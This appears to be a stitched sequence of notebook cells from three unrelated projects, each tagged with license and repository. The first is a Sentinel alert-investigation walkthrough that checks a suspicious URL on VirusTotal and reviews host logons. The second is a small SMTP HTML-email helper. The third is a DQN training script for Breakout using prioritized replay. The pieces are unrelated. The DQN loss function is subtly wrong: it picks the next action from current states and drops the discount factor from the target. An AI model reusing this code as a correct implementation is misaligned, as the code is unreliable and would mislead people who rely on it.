vt_key = mas.GetEnvironmentKey(env_var='VT_API_KEY', help_str='To obtain an API key sign up here https://www.virustotal.com/', prompt='Virus Total API key:') vt_key.display() if vt_key.value and ioc_df is not None and not ioc_df.empty: vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2) print(f'{len(ioc_df)} items in input frame') supported_counts = {} for ioc_type in vt_lookup.supported_ioc_types: supported_counts[ioc_type] = len(ioc_df[ioc_df['IoCType'] == ioc_type]) print('Items in each category to be submitted to VirusTotal') print('(Note: items have pre-filtering to remove obvious erroneous ' 'data and false positives, such as private IPaddresses)') print(supported_counts) print('-' * 80) vt_results = vt_lookup.lookup_iocs(data=ioc_df, type_col='IoCType', src_col='Observable') pos_vt_results = vt_results.query('Positives > 0') if len(pos_vt_results) > 0: display(HTML(f'<h3>{len(pos_vt_results)} Positive Results Found</h3>')) display(pos_vt_results[['Observable', 'IoCType','Permalink', 'ResolvedDomains', 'ResolvedIPs', 'DetectedUrls', 'RawResponse']]) display(HTML('<h3>Other results</h3>')) display(vt_results.query('Status == "Success"'))
5 items in input frame Items in each category to be submitted to VirusTotal (Note: items have pre-filtering to remove obvious erroneous data and false positives, such as private IPaddresses) {'ipv4': 0, 'dns': 2, 'url': 2, 'md5_hash': 0, 'sha1_hash': 0, 'sh256_hash': 0} -------------------------------------------------------------------------------- Invalid observable format: "wh401k.org", type "dns", status: Observable does not match expected pattern for dns - skipping. (Source index 4) Invalid observable format: "wh401k.org", type "dns", status: Observable does not match expected pattern for dns - skipping. (Source index 0) Submitting observables: "http://wh401k.org/getps"", type "url" to VT. (Source index 4) Error in response submitting observables: "http://wh401k.org/getps"", type "url" http status is 403. Response: None (Source index 4) Submitting observables: "http://wh401k.org/getps"</decoded>", type "url" to VT. (Source index 0) Error in response submitting observables: "http://wh401k.org/getps"</decoded>", type "url" http status is 403. Response: None (Source index 0) Submission complete. 4 responses from 5 input rows
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
To view the raw response for a specific row.```import jsonrow_idx = 0 The row number from one of the above dataframesraw_response = json.loads(pos_vt_results['RawResponse'].loc[row_idx])raw_response``` [Contents](toc) Alert command line - Occurrence on other hosts in workspaceTo get a sense of whether the alert process is something that is occuring on other hosts, run this section.This might tell you that the alerted process is actually a commonly-run process and the alert is a false positive. Alternatively, it may tell you that a real infection or attack is happening on other hosts in your environment.
# set the origin time to the time of our alert query_times = mas.QueryTime(units='day', before=5, max_before=20, after=1, max_after=10, origin_time=security_alert.origin_time) query_times.display() # API ILLUSTRATION - Find the query to use qry.list_queries() # API ILLUSTRATION - What does the query look like? qry.query_help('list_hosts_matching_commandline') # This query needs a commandline parameter which isn't supplied # by default from the the alert # - so extract and escape this from the process if not security_alert.primary_process: raise ValueError('This alert has no process entity. This section is not applicable.') proc_match_in_ws = None commandline = security_alert.primary_process.CommandLine commandline = mas.utility.escape_windows_path(commandline) if commandline.strip(): proc_match_in_ws = qry.list_hosts_matching_commandline(provs=[query_times, security_alert], commandline=commandline) else: print('process has empty commandline') # Check the results if proc_match_in_ws is None or proc_match_in_ws.empty: print('No proceses with matching commandline found in on other hosts in workspace') print('between', query_times.start, 'and', query_times.end) else: hosts = proc_match_in_ws['Computer'].drop_duplicates().shape[0] processes = proc_match_in_ws.shape[0] print('{numprocesses} proceses with matching commandline found on {numhosts} hosts in workspace'\ .format(numprocesses=processes, numhosts=hosts)) print('between', query_times.start, 'and', query_times.end) print('To examine these execute the dataframe \'{}\' in a new cell'.format('proc_match_in_ws')) print(proc_match_in_ws[['TimeCreatedUtc','Computer', 'NewProcessName', 'CommandLine']].head())
No proceses with matching commandline found in on other hosts in workspace between 2019-02-08 22:04:16 and 2019-02-14 22:04:16
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Host LogonsThis section retrieves the logon events on the host in the alert.You may want to use the query times to search over a broader range than the default.
# set the origin time to the time of our alert query_times = mas.QueryTime(units='day', origin_time=security_alert.origin_time, before=1, after=0, max_before=20, max_after=1) query_times.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Alert Logon AccountThe logon associated with the process in the alert.
logon_id = security_alert.get_logon_id() if logon_id: if logon_id in ['0x3e7', '0X3E7', '-1', -1]: print('Cannot retrieve single logon event for system logon id ' '- please continue with All Host Logons below.') else: logon_event = qry.get_host_logon(provs=[query_times, security_alert]) nbdisp.display_logon_data(logon_event, security_alert) else: print('No account entity in the source alert or the primary account had no logonId value set.')
### Account Logon Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-02-13 22:03:42.283000 Logon type: 4 (Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Session id '0x1e821b5' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
All Host LogonsSince the number of logon events may be large and, in the case of system logons, very repetitive, we use clustering to try to identity logons with unique characteristics.In this case we use the numeric score of the account name and the logon type (i.e. interactive, service, etc.). The results of the clustered logons are shown below along with a more detailed, readable printout of the logon event information. The data here will vary depending on whether this is a Windows or Linux host.
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features, _string_score host_logons = qry.list_host_logons(provs=[query_times, security_alert]) if host_logons is not None and not host_logons.empty: logon_features = host_logons.copy() logon_features['AccountNum'] = host_logons.apply(lambda x: _string_score(x.Account), axis=1) logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1) # you might need to play around with the max_cluster_distance parameter. # decreasing this gives more clusters. (clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated', cluster_columns=['AccountNum', 'LogonType'], max_cluster_distance=0.0001) print('Number of input events:', len(host_logons)) print('Number of clustered events:', len(clus_logons)) print('\nDistinct host logon patterns:') display(clus_logons.sort_values('TimeGenerated')) else: print('No logon events found for host.') # Display logon details nbdisp.display_logon_data(clus_logons, security_alert)
### Account Logon Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-02-13 22:03:42.283000 Logon type: 4 (Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Session id '0x1e821b5' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: ### Account Logon Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-02-13 21:10:58.540000 Logon type: 5 (Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Session id '0x3e7' System logon session Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: ### Account Logon Account: DWM-2 Account Domain: Window Manager Logon Time: 2019-02-12 22:22:21.240000 Logon type: 2 (Interactive) User Id/SID: S-1-5-90-0-2 Session id '0x106b458' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Comparing All Logons with Clustered results relative to Alert time line
# Show timeline of events - all logons + clustered logons if host_logons is not None and not host_logons.empty: nbdisp.display_timeline(data=host_logons, overlay_data=clus_logons, alert=security_alert, source_columns=['Account', 'LogonType'], title='All Host Logons')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
View Process Session and Logon Events in TimelinesThis shows the timeline of the clustered logon events with the process tree obtained earlier. This allows you to get a sense of which logon was responsible for the process tree session whether any additional logons (e.g. creating a process as another user) might be associated with the alert timeline.*Note you should use the pan and zoom tools to align the timelines since the data may be over different time ranges.*
# Show timeline of events - all events if host_logons is not None and not host_logons.empty: nbdisp.display_timeline(data=clus_logons, source_columns=['Account', 'LogonType'], alert=security_alert, title='Clustered Host Logons', height=200) try: nbdisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session', height=200) except NameError: print('process_tree not available for this alert.') # Counts of Logon types by Account if host_logons is not None and not host_logons.empty: display(host_logons[['Account', 'LogonType', 'TimeGenerated']] .groupby(['Account','LogonType']).count() .rename(columns={'TimeGenerated': 'LogonCount'}))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Failed Logons
failedLogons = qry.list_host_logon_failures(provs=[query_times, security_alert]) if failedLogons.shape[0] == 0: display(print('No logon failures recorded for this host between {security_alert.start} and {security_alert.start}')) failedLogons
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Appendices Available DataFrames
print('List of current DataFrames in Notebook') print('-' * 50) current_vars = list(locals().keys()) for var_name in current_vars: if isinstance(locals()[var_name], pd.DataFrame) and not var_name.startswith('_'): print(var_name)
List of current DataFrames in Notebook -------------------------------------------------- mydf alert_counts alert_list related_alerts process_tree processes_on_host feature_procs clus_events source_processes ioc_df dec_df ioc_dec_df vt_results pos_vt_results proc_match_in_ws logon_event host_logons logon_features clus_logons failedLogons
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Compose and send emails> Compose and send html emails through an SMTP server using TLS.
#hide from nbdev.showdoc import * #export import smtplib from email.message import EmailMessage import mimetypes from pathlib2 import Path import re
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Complose a message
#export def create_html_message(from_address, to_addresses, subject, html, text = None, image_path = Path.cwd()): msg = EmailMessage() msg['From'] = from_address msg['To'] = to_addresses msg['Subject'] = subject if text is not None: msg.set_content(text) msg.add_alternative(html, subtype='html') cid_images = list(re.findall(fr'<img src="cid:(.*?)"', html)) cid_images.extend(list(re.findall(fr'url\(cid:(.*?)\)', html))) cid_images = list(set(cid_images)) for cid_img in cid_images: with open(image_path / cid_img, 'rb') as img: msg.get_payload()[-1].add_related(img.read(),'image', 'jpeg', cid = cid_img) return msg
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Add an attachment to a message
#export def add_attachmet(msg, path): "Add an attachment with location `path` to the cunnet message `msg`." # Guess the content type based on the file's extension. Encoding # will be ignored, although we should check for simple things like # gzip'd or compressed files. ctype, encoding = mimetypes.guess_type(path) if ctype is None or encoding is not None: # No guess could be made, or the file is encoded (compressed), so # use a generic bag-of-bits type. ctype = 'application/octet-stream' maintype, subtype = ctype.split('/', 1) with open(path, 'rb') as f: msg.add_attachment(f.read(), maintype = maintype, subtype = subtype, filename = path.name) return msg
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Send a message using SMTP and TLS
#export def send_smtp_email(server, tls_port, user, pw, msg): "Send the message `msg` using the specified `server` and `port` - login using `user` and `pw`." # Create a secure SSL context try: smtp = smtplib.SMTP(server, tls_port) smtp.starttls() smtp.login(user, pw) smtp.send_message(msg) except Exception as e: print(e) finally: smtp.quit()
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Examples The following is an example on how to compose and send a html-email message.
## set user and password of the smtp server #user = '' #pw = '' # ## send email from and to myself #from_email = user #to_email = '' # #html = """ #Hello, this is a test message! #<h1>Hello 22!</h1> #<img src="cid:email.jpg"> #<h1>Hello 23!</h1> #<img src="cid:iceberg.jpg"> #""" # #msg = create_html_message(from_email, to_email, 'subject', html, image_path=Path('')) #add_attachmet(msg, Path('')) # ## uncomment after setting user and pw above ##send_smtp_email('', 587, user, pw, msg)
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
DQN With Prioritized Replay BufferUse prioritized replay buffer to train a DQN agent.
import random import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import utils import gym import numpy as np from gym.core import ObservationWrapper from gym.spaces import Box import cv2 import os import atari_wrappers # adjust env from framebuffer import FrameBuffer # stack 4 consec images ENV_NAME = "BreakoutNoFrameskip-v4" # create break-out env env = gym.make(ENV_NAME) env.reset()
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
PreprocessingCrop the important part of the image, then resize to 64 x 64
class PreprocessAtariObs(ObservationWrapper): def __init__(self, env): """A gym wrapper that crops, scales image into the desired shapes and grayscales it.""" ObservationWrapper.__init__(self, env) self.image_size = (1, 64, 64) self.observation_space = Box(0.0, 1.0, self.image_size) def observation(self, img): """what happens to each observation""" # Here's what you need to do: # * crop image, remove irrelevant parts # * resize image to self.img_size # (use imresize from any library you want, # e.g. opencv, skimage, PIL, keras) # * cast image to grayscale # * convert image pixels to (0,1) range, float32 type # crop the image # remove the top part img = img[50:] # resize the image img = cv2.resize(img, dsize=(self.image_size[1], self.image_size[2])) # gray scale img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) # normalize to (0, 1) img = img.astype(np.float32) / 255.0 # add channel dimension return img[None] # adjust the env by some wrappers def PrimaryAtariWrap(env, clip_rewards=True): assert 'NoFrameskip' in env.spec.id # This wrapper holds the same action for <skip> frames and outputs # the maximal pixel value of 2 last frames (to handle blinking # in some envs) env = atari_wrappers.MaxAndSkipEnv(env, skip=4) # This wrapper sends done=True when each life is lost # (not all the 5 lives that are givern by the game rules). # It should make easier for the agent to understand that losing is bad. env = atari_wrappers.EpisodicLifeEnv(env) # This wrapper laucnhes the ball when an episode starts. # Without it the agent has to learn this action, too. # Actually it can but learning would take longer. env = atari_wrappers.FireResetEnv(env) # This wrapper transforms rewards to {-1, 0, 1} according to their sign if clip_rewards: env = atari_wrappers.ClipRewardEnv(env) # This wrapper is yours :) env = PreprocessAtariObs(env) return env def make_env(clip_rewards=True, seed=None): env = gym.make(ENV_NAME) # create raw env if seed is not None: env.seed(seed) env = PrimaryAtariWrap(env, clip_rewards) env = FrameBuffer(env, n_frames=4, dim_order='pytorch') return env env = make_env() env.reset() n_actions = env.action_space.n state_shape = env.observation_space.shape print("adjusted env with 4 consec images stacked can be created")
adjusted env with 4 consec images stacked can be created
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
Model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') def conv2d_size_out(size, kernel_size, stride): """ common use case: cur_layer_img_w = conv2d_size_out(cur_layer_img_w, kernel_size, stride) cur_layer_img_h = conv2d_size_out(cur_layer_img_h, kernel_size, stride) to understand the shape for dense layer's input """ return (size - (kernel_size - 1) - 1) // stride + 1 class DuelingDQNAgent(nn.Module): def __init__(self, state_shape, n_actions, epsilon=0): super().__init__() self.epsilon = epsilon self.n_actions = n_actions self.state_shape = state_shape # Define your network body here. Please make sure agent is fully contained here # nn.Flatten() can be useful kernel_size = 3 stride = 2 self.conv1 = nn.Conv2d(4, 16, kernel_size, stride) out_size = conv2d_size_out(state_shape[1], kernel_size, stride) self.conv2 = nn.Conv2d(16, 32, kernel_size, stride) out_size = conv2d_size_out(out_size, kernel_size, stride) self.conv3 = nn.Conv2d(32, 64, kernel_size, stride) out_size = conv2d_size_out(out_size, kernel_size, stride) # size of the output tensor after convolution batch_size x 64 x out_size x out_size self.linear = nn.Linear(64*out_size*out_size, 256) # advantage self.advantage = nn.Sequential( nn.Linear(256, 512), nn.ReLU(), nn.Linear(512, self.n_actions) ) # state value self.value = nn.Sequential( nn.Linear(256, 512), nn.ReLU(), nn.Linear(512, 1) ) def forward(self, state_t): """ takes agent's observation (tensor), returns qvalues (tensor) :param state_t: a batch of 4-frame buffers, shape = [batch_size, 4, h, w] """ # Use your network to compute qvalues for given state # qvalues = <YOUR CODE> t = self.conv1(state_t) t = F.relu(t) t = self.conv2(t) t = F.relu(t) t = self.conv3(t) t = F.relu(t) t = t.view(state_t.shape[0], -1) t = self.linear(t) t = F.relu(t) # compute advantage and state value as different heads advantage = self.advantage(t) value = self.value(t) qvalues = value + advantage - advantage.mean(dim=1, keepdim=True) assert qvalues.requires_grad, "qvalues must be a torch tensor with grad" assert len( qvalues.shape) == 2 and qvalues.shape[0] == state_t.shape[0] and qvalues.shape[1] == n_actions return qvalues def get_qvalues(self, states): """ like forward, but works on numpy arrays, not tensors """ model_device = next(self.parameters()).device states = torch.tensor(states, device=model_device, dtype=torch.float) qvalues = self.forward(states) return qvalues.data.cpu().numpy() def sample_actions(self, qvalues): """pick actions given qvalues. Uses epsilon-greedy exploration strategy. """ epsilon = self.epsilon batch_size, n_actions = qvalues.shape random_actions = np.random.choice(n_actions, size=batch_size) best_actions = qvalues.argmax(axis=-1) should_explore = np.random.choice( [0, 1], batch_size, p=[1-epsilon, epsilon]) return np.where(should_explore, random_actions, best_actions) # Evaluate the agent def evaluate(env, agent, n_games=1, greedy=False, t_max=10000): rewards = [] for _ in range(n_games): reward = 0.0 s = env.reset() for _ in range(t_max): qvalues = agent.get_qvalues([s]) action = qvalues.argmax(axis=-1)[0] if greedy else agent.sample_actions( qvalues)[0] s, r, done, _ = env.step(action) reward += r if done: break rewards.append(reward) return np.mean(rewards)
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
Compute TD loss
def compute_td_loss(states, actions, rewards, next_states, is_done, agent, target_network, gamma=0.99, device=device, check_shapes=False): """ Compute td loss using torch operations only. Use the formulae above. ''' objective of agent is \hat Q(s_t, a_t) = r_t + \gamma Target(s_{t+1}, argmax_{a} Q(s_{t+1}, a)) """ states = torch.tensor(states, device=device, dtype=torch.float) # shape: [batch_size, *state_shape] # for some torch reason should not make actions a tensor actions = torch.tensor(actions, device=device, dtype=torch.long) # shape: [batch_size] rewards = torch.tensor(rewards, device=device, dtype=torch.float) # shape: [batch_size] # shape: [batch_size, *state_shape] next_states = torch.tensor(next_states, device=device, dtype=torch.float) is_done = torch.tensor( is_done, device=device, dtype=torch.float ) # shape: [batch_size] is_not_done = 1 - is_done # get q-values for all actions in current states predicted_qvalues = agent(states) # compute q-values for all actions in next states predicted_next_qvalues = target_network(next_states) # best action in next state next_best_actions = torch.argmax(agent(states), dim=1) # select q-values for chosen actions predicted_qvalues_for_actions = predicted_qvalues[range( len(actions)), actions] # compute the objective of the agent next_state_values = predicted_next_qvalues[range( len(actions)), next_best_actions] # assert next_state_values.dim( # == 1 and next_state_values.shape[0] == states.shape[0], "must predict one value per state" # compute "target q-values" for loss - it's what's inside square parentheses in the above formula. # at the last state use the simplified formula: Q(s,a) = r(s,a) since s' doesn't exist # you can multiply next state values by is_not_done to achieve this. # target_qvalues_for_actions = <YOUR CODE> target_qvalues_for_actions = rewards + next_state_values * is_not_done # mean squared error loss adjusted by importance sampling weights to minimize #loss = torch.mean( # weights * torch.pow(predicted_qvalues_for_actions - target_qvalues_for_actions.detach(), 2) #) # return the TD-loss if check_shapes: assert predicted_next_qvalues.data.dim( ) == 2, "make sure you predicted q-values for all actions in next state" assert next_state_values.data.dim( ) == 1, "make sure you computed V(s') as maximum over just the actions axis and not all axes" assert target_qvalues_for_actions.data.dim( ) == 1, "there's something wrong with target q-values, they must be a vector" return target_qvalues_for_actions - predicted_qvalues_for_actions
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
Test the memory need of the replay buffer Init DQN agent and play a total 10^4 time steps
def play_and_record(initial_state, agent, env, exp_replay, n_steps=1): """ Play the game for exactly n steps, record every (s,a,r,s', done) to replay buffer. Whenever game ends, add record with done=True and reset the game. It is guaranteed that env has done=False when passed to this function. PLEASE DO NOT RESET ENV UNLESS IT IS "DONE" :returns: return sum of rewards over time and the state in which the env stays """ s = initial_state sum_rewards = 0 # Play the game for n_steps as per instructions above sum_rewards = 0.0 for _ in range(n_steps): qvalues = agent.get_qvalues([s]) action = agent.sample_actions(qvalues)[0] next_s, r, done, _ = env.step(action) exp_replay.add((s, action, r, next_s, done)) sum_rewards += r if done: s = env.reset() else: s = next_s return sum_rewards, s import utils import imp import replay_buffer imp.reload(replay_buffer) from replay_buffer import PrioritizedReplayBuffer #n_actions = env.action_space.n #state_shape = env.observation_space.shape agent = DuelingDQNAgent(state_shape=state_shape, n_actions=n_actions) exp_replay = PrioritizedReplayBuffer(10**4) ''' for i in range(100): state = env.reset() if not utils.is_enough_ram(min_available_gb=0.1): print(""" Less than 100 Mb RAM available. Make sure the buffer size in not too huge. Also check, maybe other processes consume RAM heavily. """ ) break play_and_record(state, agent, env, exp_replay, n_steps=10**2) if len(exp_replay) == 10**4: break print(len(exp_replay)) del exp_replay ''' seed = 42 # env n_lives = 5 # training params T = 1 # number of experiences to get from env before each update batch_size = 16 total_steps = 3 * 10**1 # total steps to train the agent decay_steps = 10**1 # steps to decay the epsilon, # after the decay_steps, epsilon stops decaying # and the agent explores with a fixed probability max_grad_norm = 50 refresh_target_network_freq = 5000 # freqency to update the target network learning_rate = 1e-4 # agent gamma = 0.99 # discount factor init_epsilon = 1.0 final_epsilon = 0.1 # buffer buffer_size = 10**4 # eval loss_freq = 50 eval_freq = 5000 # logs ckpt_dir = 'logs' ckpt_file = 'prioritized_experience_replay_ckpt.pth' metrics_file = 'prioritized_experience_replay_metrics.pth' ckpt_freq = 10*5000 # Debug param # main loop env = make_env(seed) state_shape = env.observation_space.shape n_actions = env.action_space.n state = env.reset() agent = DuelingDQNAgent(state_shape, n_actions, epsilon=1).to(device) target_network = DuelingDQNAgent(state_shape, n_actions).to(device) target_network.load_state_dict(agent.state_dict()) exp_replay = PrioritizedReplayBuffer(buffer_size) opt = torch.optim.Adam(agent.parameters(), lr=learning_rate) mean_rw_history = [] td_loss_history = [] grad_norm_history = [] initial_state_v_history = [] print("Starts training on {}".format(next(agent.parameters()).device)) # populate the buffer with 128 samples init_size = 128 play_and_record(state, agent, env, exp_replay, init_size) for step in range(total_steps): agent.epsilon = utils.linear_decay(init_epsilon, final_epsilon, step, decay_steps) # play for $T time steps and cache the exprs to the buffer _, state = play_and_record(state, agent, env, exp_replay, T) b_idx, obses_t, actions, rewards, obses_tp1, dones, weights = exp_replay.sample( batch_size) # td loss for each sample td_loss = compute_td_loss( states=obses_t, actions=actions, rewards=rewards, next_states=obses_tp1, is_done=dones, agent=agent, target_network=target_network, gamma=gamma, device=device, check_shapes=True) ''' A batch of samples from prioritized replay looks like: (states, actions, rewards, next_states, weights, is_done) weights here are importance sampling weights Basically: Loss = weights * MSE ''' # compute MSE adjusted by importance sampling weights # and backprop weights = torch.tensor(weights, dtype=torch.float32) #print(weights, torch.pow(td_loss, 2)) loss = torch.mean(weights * torch.pow(td_loss, 2)) loss.backward() grad_norm = nn.utils.clip_grad_norm_(agent.parameters(), max_grad_norm) opt.step() opt.zero_grad() # update the priorities of sampled exprs exp_replay.batch_update(b_idx, np.abs(td_loss.detach().cpu().numpy())) # increase the importance sampling hyperparameter b gradually to 1 exp_replay.increment_b() if step % loss_freq == 0: # save MSE without importance sampling loss = torch.mean(torch.pow(td_loss, 2)) td_loss_history.append(loss.cpu().item()) if step % refresh_target_network_freq == 0: target_network.load_state_dict(agent.state_dict()) if step % eval_freq == 0: mean_rw_history.append(evaluate( make_env(clip_rewards=True, seed=step), agent, n_games=3*n_lives, greedy=True )) initial_state_q_values = agent.get_qvalues( [make_env(seed=step).reset()] ) initial_state_v_history.append(np.max(initial_state_q_values)) print("buffer size = %i, epsilon: %.5f" % (len(exp_replay), agent.epsilon)) # TODO # checkpointing if step % ckpt_freq == 0: print("checkpointing ...") if not os.path.exists(ckpt_dir): os.makedirs(ckpt_dir) # check point model and optimizer checkpoint = { "step": step, "agent": agent.state_dict(), "epsilon": agent.epsilon, "target_network": target_network.state_dict(), "optimizer": opt.state_dict(), "replay_buffer": exp_replay } torch.save(checkpoint, os.path.join(ckpt_dir, ckpt_file)) # save the performance metric metrics = { "mean_rw_history": mean_rw_history, "td_loss_history": td_loss_history, "grad_norm_history": grad_norm_history, "initial_state_v_history": initial_state_v_history } torch.save(metrics, os.path.join(ckpt_dir, metrics_file)) # check point model and optimizer checkpoint = { "step": step, "agent": agent.state_dict(), "epsilon": agent.epsilon, "target_network": target_network.state_dict(), "optimizer": opt.state_dict(), "replay_buffer": exp_replay } torch.save(checkpoint, os.path.join(ckpt_dir, ckpt_file)) # save the performance metric metrics = { "mean_rw_history": mean_rw_history, "td_loss_history": td_loss_history, "grad_norm_history": grad_norm_history, "initial_state_v_history": initial_state_v_history } torch.save(metrics, os.path.join(ckpt_dir, metrics_file))
Starts training on cpu buffer size = 129, epsilon: 1.00000 checkpointing ...
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL